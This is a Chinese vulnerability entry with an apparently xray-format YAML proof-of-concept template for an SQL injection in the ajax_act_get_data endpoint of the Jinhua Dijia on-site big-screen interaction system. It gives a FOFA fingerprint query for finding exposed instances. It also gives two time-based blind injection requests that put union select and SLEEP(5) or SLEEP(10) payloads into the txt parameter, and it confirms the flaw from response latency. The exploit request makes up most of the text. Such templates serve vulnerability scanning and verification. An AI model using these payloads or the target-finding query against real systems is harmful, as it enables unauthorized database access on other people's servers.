漏洞描述
金华迪加现场大屏互动系统ajax_act_get_data存在SQL注入
fofa:body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
jinhuadijia-daping-ajax-act-get-data-sqli: 金华迪加现场大屏互动系统ajax_act_get_data存在SQL注入漏洞
PoC代码[已公开]
id: jinhuadijia-daping-ajax-act-get-data-sqli
info:
name: 金华迪加现场大屏互动系统ajax_act_get_data存在SQL注入漏洞
author: AVIC123
severity: high
verified: true
description: |
金华迪加现场大屏互动系统ajax_act_get_data存在SQL注入
fofa:body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
reference:
- https://vip.bdziyi.com/58465/
tags: jinhuadijia,daping,sqli
created: 2025/08/20
set:
hostname: request.url.host
rules:
r0:
request:
method: GET
path: /Modules/module.php?m=importlottery&c=admin&a=ajax_act_get_data&txt=%") union select 1,2,3,md5(1),5 AND (SELECT 4595 FROM (SELECT(SLEEP(5)))ZZjy)#
expression: response.status == 200 && response.latency <= 7000 && response.latency >= 5000
r1:
request:
method: GET
path: /Modules/module.php?m=importlottery&c=admin&a=ajax_act_get_data&txt=%") union select 1,2,3,md5(1),5 AND (SELECT 4595 FROM (SELECT(SLEEP(10)))ZZjy)#
expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
expression: r0() && r1()